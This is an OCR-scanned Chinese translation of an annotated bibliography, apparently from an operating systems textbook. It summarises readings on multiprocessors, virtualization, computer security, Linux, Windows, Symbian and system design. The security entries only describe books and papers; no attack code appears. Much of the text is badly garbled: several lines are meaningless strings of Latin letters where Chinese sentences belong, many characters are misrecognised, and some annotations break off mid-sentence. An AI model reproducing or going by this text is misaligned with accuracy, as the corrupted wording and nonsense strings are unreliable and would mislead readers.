这 一 思想 ， 并 且 给 出 了 对 当前 在 使 用 的 一 些 大 型 系统 的 概况 介绍 。 根 据 
摩尔 定律 可 以 合理 推 亲 ， 这 里 提 到 的 规模 大 约 每 两 年 就 会 增长 一 倍 。 


Dubois et al., “Synchronization, Coherence, and Event Ordering in 


Multiprocessors” 





TAME PKR TETH E is tit & Wh as BSP LT ITSP 
H, SRA EE AEE PEACE SL ait A op A A Ai AB he TH eH AY o 


Geer, “For Programmers, Multicore Chips Mean Multiple 


Challenges” 


多 核 蕊 片 的 时 代 正 在 到 3 ` 论 软件 界 的 人 们 是 否 准 备 好 。 实 际 
上 他 们 并 没有 准备 好 ， 而 且 为 这 些 心 片 编写 程序 往往 是 巳 大 的 挑战 ， 这 
包括 选择 合适 的 工具 、 将 有 关 工 作 划 分 成 小 的 部 分 ， 以 及 测试 结果 等 。 








Kant and Mohapatra, “Internet Data Centers” 


Interet 数 据 中 心 是 一 个 被 兴奋 剂 刺 激 起 来 的 巨大 多 计算 机 。 和 常常 让 
成 干 上 万 台 计 算 机 为 一 个 应 用 软件 而 工作 。 这 里 的 主要 问题 就 是 可 伸缩 
性 、 可 维护 性 和 能 源 。 这 篇 文章 既是 对 有 关 问 题 的 一 个 介绍 ， 也 是 对 同 


一 个 问题 的 其 他 4 篇 文章 的 介绍 。 





Kumar et al., “Heterogeneous Chip Multiprocessors” 





用 在 台式 电脑 上 的 多 核 蕊 片 是 对 称 的 一 一 每 一 个 核 是 相同 的 。 然 而 
对 一 些 应 用 软件 来 说 ， 异 构 的 多 处 理 器 (Chip multiprocessors,CMPS) 
是 很 普遍 的 ， 有 的 核 用 来 计算 、 有 的 处 理 视频 编码 、 有 的 处 理 音 频 编码 
等 。 这 篇 文章 就 讨论 异 构 多 处 理 器 中 的 有 关 问 题 。 


= 于 








Kwok and Ahmad, “Static Scheduling Algorithms for Allocating 


Directed Task Graphs to Multiprocessors” 


OUR Ge HW RE PA ELAR, ME ET Se TP HL Ree Se NOTE 
名 进行 优化 作业 调度 。 问 题 在 于 最 优 调度 的 计算 时 间 会 很 长 。 在 这 篇 论 
文中 ， 作 者 讨论 并 且 比 较 了 用 不 同方 法 解决 这 个 问题 的 27 种 著名 的 算 


Rosenblum and Garfinkel, “Virtual Machine Monitors: Current 


Technology and Future Trends” 


这 篇 文章 从 虚拟 机 监视 器 的 历史 谈 起 ， 然 后 讨论 现 有 处 理 器 、 内 存 


和 LO 的 虚拟 化 情况 。 文 章 涉及 的 领域 不 但 包括 上 面 三 个 方面 ， 还 包括 
将 来 如 何 用 人 硬件 来 减少 这 些 问 题 。 





Whitaker et al., “Rethinking the Design of Virtual Machine Monitors” 








多 数 计算 机 都 有 一 些 奇怪 和 难于 虚拟 化 的 方面 。 在 这 篇 文章 中 
Denali 系 统 的 作者 束 虚 拟 化 进行 了 一 些 探讨 ， 即 如 何 修改 客 刻 操作 系统 
以 避免 遇 到 一 些 奇怪 的 特性 ， 由 此 来 防止 仿真 这 些 特 性 。 
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Bratus, “What Hackers Learn That the Rest of Us Don't” 


是 什么 让 黑客 如 此 与 众 不 同 ? 他 们 所 关注 的 ， 而 一 般 程序 员 却 忽略 
的 ， 是 什么 ? 他 们 对 API 态 度 不 同 吗 ? 文 末 问题 重要 吗 ? 读者 好 奇 吗 ? 
如 果 感 兴趣 ， 建 议 读 一 读 。 


Computer, Feb 2000 





这 一 期 Computer 的 主题 是 生物 测量 学 。 关 于 这 个 主题 有 6 篇 论文 ， 


从 入 门 到 专题 ， 从 各 种 特定 技术 到 法 律 和 隐私 问题 ， 论 文 都 有 涉及 。 


Denning, Information Warfare and Security 





言 息 已 经 变 成 了 战争 武器 ， 既 是 军事 武器 也 是 军事 配合 武器 。 参 与 
者 不 仅 尝试 攻击 对 方 的 信息 系统 ， 而 且 要 防卫 好 自己 的 系统 。 在 这 本 吸 
引 人 的 书 中 ， 作 者 讨论 了 所 有 能 想到 的 关于 攻击 策略 和 防卫 策略 的 话 

题 ， 从 数据 欺骗 到 包 窥探 器 。 该 书 对 于 计算 机 安全 有 极 大 兴趣 的 读者 来 
说 是 必 读 的 。 








Ford and Allen, “How Not to Be Seen” 


病毒 ， 间 谍 软 件 ，rootkits 和 数字 版 权 管 理 系统 都 对 隐藏 数据 情 有 独 


钟 。 这 篇 文章 对 各 种 隐身 的 方法 进行 了 简要 的 介绍 。 





Hafner and Markoff, Cyberpunk 


PENASTE CAMA SR) ASL tg SCE 2 HY RAED 
的 计算 机 记者 讲述 的 世界 上 关于 年 轻 黑 客 破 坏 计 算 机 的 三 种 流传 最 广 的 
故事 。 


Johnson and Jajodia, “Exploring Steganography: Seeing the Unseen” 


AAA AIS AR Se, BY DAT BIDE ES EASA ACIDE, PA Ja CERI IE 
的 头 上 纹 上 信息 ， 然 后 在 信使 的 头发 长 出 来 之 后 再 将 他 送 走 的 年 代 。 尽 
管 当 前 的 技术 很 多 ， 但 是 它们 也 是 数字 化 的 。 本 书 对 于 想 在 这 一 主题 彻 
底 入 门 的 读者 来 说 是 一 个 开端 。 

Ludwig, The Litte Black Book of Email Viruses 

如 果 想 编写 反 病 毒 软件 并 且 想 了 解 在 位 级 别 Chit level) 上 这 些 病 
毒 是 怎么 工作 的 ， 那 么 这 本 书 很 适合 。 每 种 病毒 都 有 详细 的 讨论 并 且 也 


提供 了 绝 大 多 数 的 实际 人 代码。 但是， 要求 读者 透彻 掌握 Pentium 汇 编 语 
言 编 程 知 识 。 





Mead, “Who is Liable for Insecure Systems?” 


很 多 有 关 计 算 机 安全 的 措施 都 是 从 技术 角度 出 发 的 ， 但 是 这 不 是 疏 








一 的 角度 。 也 许 软件 经 销 商 应 该 对 由 于 他 们 的 问题 软件 而 带 来 的 损失 负 
起 责任 。 如 果 比 现在 更 多 地 关注 于 安全 ， 这 会 是 经 销 商 的 机 会 吗 ? 对 这 
个 提 法 感 兴趣 吗 ? 可 以 读 一 下 这 篇 文章 。 


Milojicic, “Security and Privacy” 


安全 性 涉及 很 多 方面 ， 包 括 操作 系统 、 网 络 、 私 密 性 表示 等 。 在 这 
篇 文章 中 ，6 位 安全 方面 的 专家 给 出 了 他 们 各 目 关 于 这 个 主题 的 想法 和 


见解 。 








Nachenberg, “Computer Virus-Antivirus Coevolution” 


当 反 病毒 的 开发 人 员 找 到 一 种 方法 能 够 探测 某 种 电脑 病毒 并 且 使 其 
失效 时 ， 病 毒 的 编写 者 已 经 在 改进 和 开发 更 强 的 病毒 。 本 书 探讨 了 这 种 
制造 病毒 和 反 病 毒 之 间 的 “ 猫 和 老鼠 ?游戏 。 作 者 对 于 反 病 毒 编写 者 能 合 
取胜 这 场 游戏 并 不 持 乐 观 态 度 ， 这 对 电脑 用 户 来 说 也 许 不 是 一 个 好 消 














| 
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Pfleeger, Security in Computing, 4th ed. 


尽管 已 经 出 版 了 很 多 关于 计算 机 安全 的 书籍 ， 但 大 多 数 却 只 关注 网 
络 安全 性 。 本 书 不 仅 关 注 网 络 安 全 性 ， 还 包含 了 讨论 操作 系统 安全 性 、 
数据 库 安全 性 和 分 布 式 系统 安全 性 的 划 市 。 


Sasse, “Red-Eye Blink,Bendy Shuffle,and the Yuck Factor:A User 


Experience of Biometric Airport Systems” 





作者 讲述 了 他 在 许多 大 机 场所 经 历 的 瞳孔 识别 系统 的 体验 。 不 是 所 
有 的 体验 都 是 正面 的 。 


Thibadeau, “Trusted Computing for Disk Drives and Other 


Peripherals” 


如 果 读 者 认为 磁盘 驱动 器 只 是 一 个 储存 比特 的 地 方 ， 那 么 最 好 再 考 
虑 一 下 。 现 代 的 磁盘 驱动 器 有 非常 强大 的 CPU， 兆 级 的 RAM， 多 个 通 
信 通 道 甚 至 有 自己 的 局 动 ROM。 简 而 言 之 ， 它 就 是 一 个 完整 的 计算 机 
系统 ， 很 容易 被 攻击 ， 因 此 它 也 需要 有 自己 的 保护 机 制 。 这 篇 文章 讨论 
的 就 是 磁盘 驱动 器 的 安全 问题 。 

















14.1.10 Linux 


Bovet and Cesati, Understanding the Linux Kernel 


该 书 也 许 是 对 Linux 内 核 整 体 知识 讨论 最 好 的 一 本 书 。 它 涵盖 了 进 
程 、 存 储 管理 、 文 件 系统 和 信和 号 等 内 容 。 


IEEE, Information Technology: Portable Operating System 





Interface (POSIX) , Part 1: SystemApplication Program 


Interface (API) [C Language] 

这 是 一 个 标准 。 一 些 部 分 确实 值得 一 读 ， 特 别 是 附录 B， 清 晰 阐述 
了 为 什么 要 这 样 做 。 参 考 标准 的 一 个 好 处 在 于 通过 定义 不 会 出 现 错误 。 
例如 ， 如 果 一 个 宏 的 名 字 中 的 排 字 错误 贯穿 了 整个 编辑 过 程 ， 那 么 它 将 
不 再 是 一 个 错误 ， 而 成 为 一 种 正式 标准 。 


Fusco, The Linux Programmers'Toolbox 


这 本 书 是 为 那些 知道 一 些 基 本 Linux 知 识 ， 并 且 和 希望 能 够 进一步 了 
解 Linux 程 序 如 何 工 作 的 中 级 读者 们 写作 的 。 该 书 假定 读者 是 一 个 C 程 序 
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Maxwell, Linux Core Kernel Commentary 


该 书 的 前 400 页 给 出 了 Linux 的 内 核 源 代码 的 一 个 子 集 。 后 面 的 150 
页 则 是 对 这 些 代 码 的 评述 。 与 John Lions 的 经 典 书籍 (1996) 风格 很 相 
似 。 如 果 你 想 了 解 Linux 内 核 的 很 多 细节 ， 那 么 这 是 一 个 不 错 的 起 点 ， 
但 是 读 40 000 行 C 语 言 代 码 不 是 每 个 人 都 必需 的 。 


14.1.11 Windows Vista 


Cusumano and Selby, “How Microsoft Builds Software” 





你 是 否 兽 经 好 奇 过 一 个 人 如 何 能 够 写 出 29 000 000 行 代码 〈 就 像 
Windows 2000 一 样 ) ， 并 且 让 它 作为 一 个 整体 运转 起 来 ?希望 探究 微软 
是 如 何 采 用 建造 和 测试 循环 来 管理 大 型 软件 项 目的 读者 ， 可 以 参看 这 篇 
论文 。 其 过 程 相当 有 启发 性 。 


Rector and Newcomer, Win32 Programming 


如 果 想 找 一 本 1500 页 的 书 ， 告 诉 你 如 何 编写 Windows 程 序 ， 那 么 读 
这 本 书 是 一 个 不 错 的 开始 。 它 涵盖 了 窗口 、 设 备 、 图 形 输出 、 键 盘 和 鼠 
标 输 入 、 打 印 、 存 储 管理 、 库 和 同步 等 许多 主题 。 阅 读 这 本 书 要 求 读者 
具有 C 或 者 C++ 语言 的 知识 。 


Russinovich and Solomon, Microsoft Windows Internals,4th ed. 





如 果 想 学 习 如 何 使 用 Windows， 可 能 会 有 几 百 种 相关 的 书 。 如 果 想 
知道 Windows 内 部 如 何 工 作 的 ， 本 书 是 读者 最 好 的 选择 。 它 给 出 了 很 多 
内 部 算法 和 数据 结构 以 及 可 观 的 技术 细节 。 没 有 任何 一 本 书 可 以 蔡 代 。 


14.1.12 ”Symbian 操作 系统 


Cinque et al., “How do Mobile Phone Fail?A Failure Data Analysis of 


Symbian OS Smart Phones” 


以 前 不 论 怎样 ， 当 计算 机 朋 尝 时， 至 少 电 话 总 是 可 以 用 的 。 而 现在 
电话 其 实 就 是 一 个 小 屏幕 的 计算 机 ， 它 们 也 会 因为 糟 料 的 软件 而 央 尝 。 
本 文 讨 论 了 可 以 导致 Symbian 手 机 或 者 终 问 月 尝 的 软件 错误 。 


Morris, The Symbian OS Architecture Sourcebook 








如 果 你 一 直 在 寻找 关于 Symbian 操 作 系 统 的 进一步 细 市 ， 那 么 本 书 
是 一 个 很 好 的 开始 。 它 涉及 了 Symbian 的 体系 结构 和 相当 数量 的 各 层 细 
节 ， 而 且 还 给 出 了 一 些 实例 分 析 。 


Stichbury and Jacobs, The Accredited Symbian Developer Primer 


如 果 你 对 为 Symbian 手 机 或 者 掌上 电脑 如 何 开发 应 用 软件 感 兴趣 的 
话 ， 那 么 本 书 是 一 个 不 错 的 选择 。 它 从 所 需要 的 C++ 语 言 计 起， 逐步 深 
入 到 系统 结构 、 文 件 系 统 、 网 络 管理 、 工 具 链 和 兼容 性 。 


14.1.13 ”设计 原则 


Brooks，The Mythical Man Month: Essays On Software Engineering 


Fred Brooks 是 IBM 的 OS/360 的 主要 设计 者 之 一 。 以 其 丰富 的 经 验 ， 
他 知道 在 计算 机 的 设计 中 什么 是 可 以 运行 的 和 什么 是 不 能 运行 的 。 他 在 
25 年 前 写 下 这 本 谈 谐 且 内 涵 丰 富 的 书 中 给 出 的 建议 现在 一 样 是 可 行 的 。 
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Cooke et al., “UNIX and Beyond: An Interview with Ken Thompson’ 


设计 一 个 操作 系统 与 其 说 是 一 门 科 学 ， 不 如 说 是 一 门 艺术 。 因 此 ， 
倾听 该 领域 专家 的 谈话 是 一 个 学 习 这 方面 知识 的 有 效 途径 。 在 操作 系统 
领域 中 ， 没 有 谁 比 Ken Thompson 更 有 发 言 权 的 了 。 在 对 这 位 UNIX、 
Iferno、Plan9 操 作 系统 的 合作 设计 者 的 访问 过 程 中 ，Ken Thompson 
明了 在 这 个 领域 中 我 们 从 哪里 开始 和 即将 走向 哪里 等 问题 。 





Corbato, “On Building Systems That Will Fail” 


FESR A ARATE A SE, AL KZ AIR 4 Brooks 
在 《人 月 神话 》 中 同样 关注 的 问题 。 他 的 结论 是 所 有 的 复杂 系统 都 将 最 
终 失 败 ， 为 了 设计 一 个 成 功 的 系统 ， 避 免 复杂 化 、 退 求 设 计 上 的 优雅 风 
格 和 简单 化 原则 是 绝对 重要 的 。 








Crowley, Operating Systems:A Design-Oriented Approach 


大 多 数 介 绍 操作 系统 的 教材 仅 仪 是 讲 操作 系统 的 基本 概念 〈 进 程 调 
度 、 虚 拟 内 存 等 ) 和 列举 一 些 例子 ， 对 于 如 何 设计 一 个 操作 系统 却 没有 
提 及 。 该 书 独一无二 的 特点 在 于 有 4 章 是 说 明 如 何 设计 一 个 操作 系统 
的 。 








Lampson, “Hints for Computer System Design” 


世界 上 最 主要 的 具有 创新 性 的 操作 系统 设计 者 
之 一 ， 在 他 多 年 的 设计 经 历 中 总 结 了 许多 设计 方法 、 对 设计 的 建议 和 一 
些 指导 原则 并 写 下 这 篇 恋 谐 的 内 涵 丰 寅 的 文章 ， 正 如 Brooks 的 书 一 样 ， 
对 于 有 抱负 的 操作 系统 的 设计 者 来 说 ， 这 本 书 一 定 不 要 错过 。 


Butler Lampson 














Wirth, “A Plea for Lean Software” 


著名 的 经 验 丰富 的 系统 设计 者 ， 曾 设计 了 面 问 网 
络 的 基于 图 形 用 户 界面 的 操作 系统 Oberon， 包 括 Oberon 编 译 器 和 文本 编 
辑 器 ， 只 有 200KB 。 通 过 讨论 Oberon 系 统 ， 他 阐明 软件 应 该 基于 简单 的 
概念 ， 使 其 简单 明了 ， 而 不 是 商用 化 软件 的 复杂 。 


Niklaus Wirth 
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